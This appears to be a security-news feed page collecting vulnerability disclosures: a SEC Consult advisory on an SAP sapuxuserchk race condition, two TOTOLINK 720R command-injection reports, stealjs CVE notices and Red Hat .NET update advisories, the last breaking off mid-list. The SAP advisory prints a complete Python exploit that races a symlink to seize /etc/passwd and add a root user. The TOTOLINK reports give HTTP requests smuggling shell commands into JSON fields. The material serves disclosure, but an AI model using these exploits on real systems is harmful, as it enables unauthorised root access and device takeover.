SAPControl Web Service Interface (sapstartsrv) suffers from a privilege escalation vulnerability via a race condition.

SEC Consult Vulnerability Lab Security Advisory < 20220915-0 >  
=======================================================================  
               title: Local privilege escalation  
             product: SAP® SAPControl Web Service Interface (sapuxuserchk)  
  vulnerable version: see section "Vulnerable /  tested versions"  
       fixed version: see SAP security note 3158619  
          CVE number: CVE-2022-29614  
              impact: medium  
            homepage: https://www.sap.com/about.html  
               found: 2022-02-24  
                  by: M. Li (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"The SAP Start Service (sapstartsrv) provides basic management services for  
systems and instances and single server processes. Services include starting  
and stopping, monitoring the current run-time state, reading logs, traces and  
configuration files, executing commands and retrieving other  
technology-specific information, like network access points, active sessions,  
thread list etc. They are exposed by a SOAP Web service interface named  
"SAPControl". This paper describes how to use this Web service interface."

Source: https://assets.cdn.sap.com/sapcom/docs/2016/09/0a40e60d-8b7c-0010-82c7-eda71af511fa.pdf

Business recommendation:  
------------------------  
SEC Consult recommends to implement the security note 3158619, where the  
documented issue is fixed according to the vendor. We advise installing the  
corrections as a matter of priority to keep business-critical data secured.

Vulnerability overview/description:  
-----------------------------------  
1) Local privilege escalation (CVE-2022-29614)  
The SUID-root program sapuxuserchk erroneously follows the symbolic link to  
create a temporary local logon ticket and change the ownership of the target  
file for owner access only. As member of the group sapsys, a user can therefore  
escalate his/her privileges to root on a local Unix system by successfully  
exploiting a race condition.

Proof of concept:  
-----------------  
1) Local privilege escalation (CVE-2022-29614)  
The utility sapuxuserchk is used by sapcontrol to request a temporary local  
logon ticket in the following way. As a result, the ticket is created in the  
folder /usr/sap/SEC/D00/work/sapcontrol_logon/

$ sapcontrol -nr 0 -function RequestLogonFile user0

$ ls -l logon*  
-rw------- 1 secadm sapsys 40 Feb 25 08:58 logon0  
-rw------- 1 user0  users  40 Feb 25 09:00 logon1  
-rw------- 1 root   root   40 Feb 25 09:01 logon2

Since sapcontrol is supposed to create the ticket for any system user, it  
requires a utility with SUID bit set. The owner, group and its permission bits  
of sapuxuserchk of a standard installation are shown below.

$ ls -l sapuxuserchk  
-rwsr-x--- 1 root sapsys 1312137 Feb 28  2019 sapuxuserchk

The request originating from sapcontrol is first sent to the instance server  
sapstartsrv, piping into sapuxuserchk a 512-byte encrypted message, which  
contains the ticket path, user name and ticket in the plaintext, as an example  
shown below.

$ strings input-0-plaintext  
SAPLOGONFILE /usr/sap/SEC/D00/work/sapcontrol_logon/logon1  
  user0  
1133146902252676394602837452470900726967

On its duty to create the ticket, sapuxuserchk performs the sanity check to  
guarantee the non-existence of the file prior to the creation in the  
function internal_create_saplogon_file.

However, it introduces a race condition between the stat and open calls, as  
shown by the following excerpt from strace.

stat("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", 0x7ffc0d2e1530) = -1 ENOENT (No such file or directory)  
open("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", O_RDWR|O_CREAT|O_TRUNC, 0600) = 3  
  fchown(3, 1000, 100)

The attacker can run a race of constantly creating a symbolic link logon1  
pointing to a privileged file such as /etc/passwd and meanwhile invoke the  
SUID-root program sapuxuserchk, in the hope that the creation of the link  
take place between the stat and open calls, so that the first will fail,  
(meaning that the file does not exist yet) while the second as well as the  
ensuing fchown call succeeds. In a positive result, the attacker gains the  
read-write permission of the target file.

The following run to winning the race took 629 attempts to finally gain the  
root privilege. The PoC further below lists the exploit implementing the idea  
above with a pre-intercepted message for user secadm.

-------------------------------------------------------------------------  
sh-4.3$ id  
uid=1001(secadm) gid=474(sapsys) groups=474(sapsys),1000(sapinst)

sh-4.3$ ls -l /etc/passwd  
-rw-r--r-- 1 root root 2517 Feb 25 00:47 /etc/passwd

sh-4.3$ python3 sapmatt.py  
this many tries: 629  
[+] now login as sapmatt

sh-4.3$ su sapmatt  
Password:

sh-4.3# id  
uid=0(sapmatt) gid=0(root) groups=0(root)

sh-4.3# ls -l /etc/passwd  
-rw-r--r-- 1 secadm sapsys 73 Feb 25 10:03 /etc/passwd

$ cat sapmatt.py  
import sys, os, signal, base64, random, string

secadm_msg =   
b'O9OXlWwex4ddSI5vhXFfUQvZ8Td3NWzRNIb9QN6bHY764Z0zVNuVjFHRGhHEgYgwNQDnf0/bBwzlEXCSXFkhtiDqDohuyCxG4mtRqc86FlB6DTOjBY9o/6Cb3rRSZ58jggx71JXMRk21jW3gqdem+tmqHCnIumZjodk2cuk5/MY76dsD65s3j1XrQS0RT3gPaspl/6Yb842hbVTZXVRY3cHKzNq5tZMKB2LmyyslO4xCI00eBN6k6yEKNFLvMx8lYbAIaHcfdWu3pMWVIb9rT3BoTCHwi5hBz8dHk6usdEw05q/Xuxe28gxWCUZpN09sYsd/5R8HqqLfwyiNI7CTBCA3f+fHUweJPuteD5O8bwo/mEOShHimO1gPZzhBdow2C0JszYQeQpxgRtENXPUt2qgT7TJqmItxM0puB8ry0TnKJIbk5gj0smflBPBZyTDXl+qNUmgWL1dK/SBpTUErGMVXFVBi8bNDMSUhcJa+0IQlYSBHPln17kquqhGvlRYYZVJttDNoYcvBchc4HxHZmH5pHkD4fhbcQgFT0UFgceSH1j3sE6G/M/QM1X/vTVE4534XJ3mDcFk/brOYun1dawJ30BkJ9HbP5weihwRwspOq52qRZ9CXsnJCtFPNqNWNIe8BgQUW8WV7FkiDJ+Lpp0pq8KLlZ0Yomz46YfCHkag='  
# openssl passwd sappass  
u1_passwd = "sapmatt:wPi023oIkjHdA:0:0::/root:/bin/sh\nsecadm:x:1001:474::/tmp:/bin/sh\n"  
logon_symlink = "/usr/sap/SEC/D00/work/sapcontrol_logon/logon1"  
target_file = "/etc/passwd"

g = 1024  
if not os.path.isfile(logon_symlink):  
         os.system("touch " + logon_symlink)  
secadm_msg = base64.b64decode(secadm_msg)

msg_file = '/tmp/msg' + ''.join(random.choice(string.ascii_letters) for i in range(8))  
f0 = open(msg_file, "wb")  
f0.write(secadm_msg)  
f0.close()

pid = os.fork()  
if pid == 0:  
         j = 0  
         while True:  
                 if j > g:  
                         print('done')  
                         os._exit(os.EX_OK)  
                 j += 1  
                 os.system("/usr/sap/SEC/D00/exe/sapuxuserchk < {0} > /dev/null".format(msg_file))  
else:  
         i = 0  
         uid = os.getuid()  
         success = False  
         while not success:  
                 if i > g:  
                         print("[-] give up, link too many tries: " + str(i))  
                         break  
                 i += 1  
                 try:  
                         os.unlink(logon_symlink)  
                         os.symlink(target_file, logon_symlink)  
                         statinfo = os.stat(target_file)  
                         if statinfo.st_uid == uid:  
                                 os.kill(pid, signal.SIGILL)  
                                 print("this many tries: " + str(i))  
                                 print("[+] now login as sapmatt ")  
                                 f = open(target_file, "w")  
                                 f.write(u1_passwd)  
                                 f.close()  
                                 success = True  
                 except Exception as err:  
                         print('[-] lost the race {0}'.format(err))  
         os.waitpid(pid, 0)  
         os.unlink(msg_file)

-------------------------------------------------------------------------

Vulnerable / tested versions:  
-----------------------------  
The following version of the binary was found to be vulnerable during our tests:  
* Version: 753, patch 400, changelist 1906766

According to the vendor the following products are affected by the discovered  
vulnerability:

SAP NetWeaver AS ABAP, AS Java, ABAP Platform and HANA Database, Versions:  
* KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, 7.88  
* KRNL64NUC 7.22, 7.22EXT, 7.49  
* KRNL64UC 7.22, 7.22EXT, 7.49, 7.53  
* SAPHOSTAGENT 7.2

Please refer to the vendor patch day post:  
https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10

Vendor contact timeline:  
------------------------  
2022-02-25: Contacting vendor through vulnerability submission web form.  
2022-03-04: Vendor confirms receipt and assigns SAP security incident number  
             #2270008914.  
2022-04-29: Requesting status update.  
2022-05-05: Vendor confirms vulnerability and states it might be addressed  
             in May 2022 patch day.  
2022-06-14: Vendor releases patches with SAP security note 3158619.  
2022-06-15: Requesting the confirmation of the security note on the issue.  
2022-08-11: Vendor sends the link to the Acknowledgements to Security  
             Researchers.  
2022-09-02: Requesting the confirmation of the fix.  
2022-09-03: Vendor confirms the issue has been fixed on June Patch Day.  
2022-09-15: Public release of security advisory.

Solution:  
---------  
The following security note needs to be implemented:  
https://launchpad.support.sap.com/#/notes/3158619

Workaround:  
-----------  
You can remove the SUID-bit from sapuxuserchk as temporary mitigation.

# chmod 0755 sapuxuserchk

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF M. Li / @2022

SAP SAPControl Web Service Interface Local Privilege Escalation

A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the input variable in main.js.

CVE-2022-37260: steal/main.js at c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9 · stealjs/steal

TOTOLINK-720R v4.1.5cu.374 was discovered to contain a remote code execution (RCE) vulnerability via the setTracerouteCfg function.

**Exploit Title:**Totolink 720 has a code execution vulnerability  
**Version:**V4.1.5cu.374  
**Date:**2022/08/16  
**Exploit Author:**xiaohu816  
**Vendor Homepage:**https://www.totolink.net/

**POC:**  
After the administrator logs in, enter the "system tools" - > "route tracking" page to execute the command  
Execute TLS > / TMP / 2.txt

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 58
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/advance/traceroute.html?time=1659892330160
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: SESSION_ID=2:1591951611:2
    Connection: close
    
    {"command":"aaaa\tls>/tmp/2.txt","num":"4","topicurl":"setTracerouteCfg"} 
    

**Analysis Report:**  
In the processing function of setting the routing parameters of the router, the input IP address is simply checked and then written into V6 through sprintf, and then the system is called for execution  
  
You can bypass the check by \\ t to realize command injection

CVE-2022-38535: TOTOLINK-720R/totolink 720 RCode Execution2.md at 177ee39a5a8557a6bd19586731b0e624548b67ee · Jfox816/TOTOLINK-720R

TOTOLINK-720R v4.1.5cu.374 was discovered to contain a remote code execution (RCE) vulnerability via the setdiagnosicfg function.

**Exploit Title:**Totolink 720 has a code execution vulnerability  
**Version:**V4.1.5cu.374  
**Date:**2022/08/16  
**Exploit Author:**xiaohu816  
**Vendor Homepage:**https://www.totolink.net/

**POC:**  
After the administrator logs in, enter "system tools" - > "Ping diagnosis" page  
执行tls>/tmp/1.txt命令

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1  
    Content-Length: 52  
    Accept: application/json, text/javascript, */*; q=0.01  
    X-Requested-With: XMLHttpRequest  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36  
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
    Origin: http://192.168.0.1  
    Referer: http://192.168.0.1/advance/diagnosis.html?time=1659889464870  
    Accept-Encoding: gzip, deflate  
    Accept-Language: en-US,en;q=0.9  
    Cookie: SESSION_ID=2:1591951611:2  
    Connection: close  
    
    {"ip":"aaaa\tls>/tmp/1.txt","num":"2","topicurl":"setDiagnosisCfg"}   
    

**Analysis Report:**  
In the setdiagnosicfg function, the value string corresponding to the IP in the JSON data is directly put into V6

  
Just write a string such as $(CMD) in the value corresponding to the IP to complete the command injection at CMD

CVE-2022-38534: TOTOLINK-720R/TOTOLINK 720 RCode Execution.md at fb6ba109ba9c5bd1b0d8e22c88ee14bdc4a75e6b · Jfox816/TOTOLINK-720R

A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the source and sourceWithComments variable in main.js.

CVE-2022-37262: steal/main.js at c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9 · stealjs/steal

Prototype pollution vulnerability in stealjs steal 2.2.4 via the optionName variable in main.js.

CVE-2022-37264: steal/main.js at c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9 · stealjs/steal

Red Hat Security Advisory 2022-6539-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.109 and .NET Runtime 6.0.9.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: .NET 6.0 security and bugfix update  
Advisory ID:       RHSA-2022:6539-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6539  
Issue date:        2022-09-15  
CVE Names:         CVE-2022-38013  
====================================================================  
1. Summary:

An update for .NET 6.0 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 6.0.109 and .NET Runtime  
6.0.9.

Security Fix(es):

* dotnet: DenialOfService - ASP.NET Core MVC vulnerable to stack overflow  
via ModelStateDictionary recursion. (CVE-2022-38013)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2125124 - CVE-2022-38013 dotnet: DenialOfService - ASP.NET Core MVC vulnerable to stack overflow via ModelStateDictionary recursion.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
dotnet6.0-6.0.109-1.el8_6.src.rpm

aarch64:  
aspnetcore-runtime-6.0-6.0.9-1.el8_6.aarch64.rpm  
aspnetcore-targeting-pack-6.0-6.0.9-1.el8_6.aarch64.rpm  
dotnet-6.0.109-1.el8_6.aarch64.rpm  
dotnet-apphost-pack-6.0-6.0.9-1.el8_6.aarch64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-host-6.0.9-1.el8_6.aarch64.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-6.0.9-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-6.0.9-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-6.0.109-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.aarch64.rpm  
dotnet-targeting-pack-6.0-6.0.9-1.el8_6.aarch64.rpm  
dotnet-templates-6.0-6.0.109-1.el8_6.aarch64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.aarch64.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.aarch64.rpm  
netstandard-targeting-pack-2.1-6.0.109-1.el8_6.aarch64.rpm

s390x:  
aspnetcore-runtime-6.0-6.0.9-1.el8_6.s390x.rpm  
aspnetcore-targeting-pack-6.0-6.0.9-1.el8_6.s390x.rpm  
dotnet-6.0.109-1.el8_6.s390x.rpm  
dotnet-apphost-pack-6.0-6.0.9-1.el8_6.s390x.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-host-6.0.9-1.el8_6.s390x.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-6.0.9-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-6.0.9-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-6.0.109-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.s390x.rpm  
dotnet-targeting-pack-6.0-6.0.9-1.el8_6.s390x.rpm  
dotnet-templates-6.0-6.0.109-1.el8_6.s390x.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.s390x.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.s390x.rpm  
netstandard-targeting-pack-2.1-6.0.109-1.el8_6.s390x.rpm

x86_64:  
aspnetcore-runtime-6.0-6.0.9-1.el8_6.x86_64.rpm  
aspnetcore-targeting-pack-6.0-6.0.9-1.el8_6.x86_64.rpm  
dotnet-6.0.109-1.el8_6.x86_64.rpm  
dotnet-apphost-pack-6.0-6.0.9-1.el8_6.x86_64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-host-6.0.9-1.el8_6.x86_64.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-6.0.9-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-6.0.9-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-6.0.109-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.x86_64.rpm  
dotnet-targeting-pack-6.0-6.0.9-1.el8_6.x86_64.rpm  
dotnet-templates-6.0-6.0.109-1.el8_6.x86_64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.x86_64.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.x86_64.rpm  
netstandard-targeting-pack-2.1-6.0.109-1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.109-1.el8_6.aarch64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.aarch64.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.aarch64.rpm

s390x:  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.109-1.el8_6.s390x.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.s390x.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.s390x.rpm

x86_64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.109-1.el8_6.x86_64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.x86_64.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-38013  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyMk1tzjgjWX9erEAQgw+g//amwE2QaQf5yW7EW8rt67JALUZTNashe0  
Mb7PqAALg2u0GD6ceXurkCkB3SoH40phFOZyAmgH3A60rSXLcsBvFGSp/dNjYY9y  
RYOyqRsU9QmCbCpv8/L4zL1RStoYEpnSpPUUGEXca9gdz5DZfOC2U9e9Dnn+pL4J  
cQYeELp6HnozVKTjGK8tPXw5WbLK2mgGVcDojJjf8JajykeJfXUCIR+RMQo/HNLZ  
vuW3TPzCY6gRs15mwY/96z/7Tvluk4/XIb2dT43YRpeBTvgl4f+QTRUsgTiIRJMI  
s6Q8LSC4BYE/e2KoUWoB7qATqxoghn/qrhaMs+FolQf0Q4c7ks4M6oEf9Du0oLuk  
AqCkXFKmzXxwxcMxMqxzALJFM3YagG+eaWp9IDh8R/TLNsSsleydf6SaWsl+N9zO  
IIm040FWCbgdwYQIp0WbQONbC8T6Uf7hmZKO1G6b3q6dTaGcNMRrvBirHyNpAXn5  
4J3rLPBj4yl9vkAe2pbPjhw5AftLk9Evr0HXaksS5pW9yGKVf6RvAbGTu+04+zut  
Gr9f/t3Bqr2McEzvvRAUgcHEyA2b+CtQiqm+dhbo8REVxdHT9tnF3EUgpbbdZa3z  
4yqS5t5t+SqjvfBbSbqiCxjdkLBpbGJsWRfKm8CBDS7Qc9q5kJOvE9HIbETAXFMl  
niuMj2fXmOA»Yx  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6539-01

Red Hat Security Advisory 2022-6526-01 - OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.11.0 images: RHEL-8-CNV-4.11. Issues addressed include denial of service, memory leak, and out of bounds read vulnerabilities.

Red Hat Security Advisory 2022-6526-01

Red Hat Security Advisory 2022-6522-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 3.1.423 and .NET Runtime 3.1.29.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: .NET Core 3.1 on RHEL 7 security and bugfix update  
Advisory ID:       RHSA-2022:6522-01  
Product:           .NET Core on Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6522  
Issue date:        2022-09-14  
CVE Names:         CVE-2022-38013  
====================================================================  
1. Summary:

An update for .NET Core 3.1 is now available for Red Hat Enterprise Linux  
7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
.NET Core on Red Hat Enterprise Linux Server (v. 7) - x86_64  
.NET Core on Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 3.1.423 and .NET Runtime  
3.1.29.

Security Fix(es):

* dotnet: DenialOfService - ASP.NET Core MVC vulnerable to stack overflow  
via ModelStateDictionary recursion. (CVE-2022-38013)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2125124 - CVE-2022-38013 dotnet: DenialOfService - ASP.NET Core MVC vulnerable to stack overflow via ModelStateDictionary recursion.

6. Package List:

.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
rh-dotnet31-dotnet-3.1.423-1.el7_9.src.rpm

x86_64:  
rh-dotnet31-aspnetcore-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-apphost-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-debuginfo-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-host-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-hostfxr-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-source-built-artifacts-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-templates-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-netstandard-targeting-pack-2.1-3.1.423-1.el7_9.x86_64.rpm

.NET Core on Red Hat Enterprise Linux Server (v. 7):

Source:  
rh-dotnet31-dotnet-3.1.423-1.el7_9.src.rpm

x86_64:  
rh-dotnet31-aspnetcore-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-apphost-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-debuginfo-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-host-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-hostfxr-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-source-built-artifacts-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-templates-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-netstandard-targeting-pack-2.1-3.1.423-1.el7_9.x86_64.rpm

.NET Core on Red Hat Enterprise Linux Workstation (v. 7):

Source:  
rh-dotnet31-dotnet-3.1.423-1.el7_9.src.rpm

x86_64:  
rh-dotnet31-aspnetcore-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-apphost-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-debuginfo-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-host-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-hostfxr-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-source-built-artifacts-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-templates-3.1-3.1.423-1.el7_9.x86_64.rpm  
